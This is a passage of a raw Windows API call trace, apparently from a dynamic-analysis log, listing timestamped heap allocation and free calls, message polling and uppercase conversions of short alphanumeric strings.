RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.383] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.383] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0262.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.385] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0262.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.386] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0262.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0262.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.387] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0262.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.388] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0262.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.389] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.389] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.389] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.390] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.390] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.390] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.391] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0262.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.391] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0262.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.391] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.392] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.392] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.394] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.394] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.394] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0262.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.395] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.395] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) 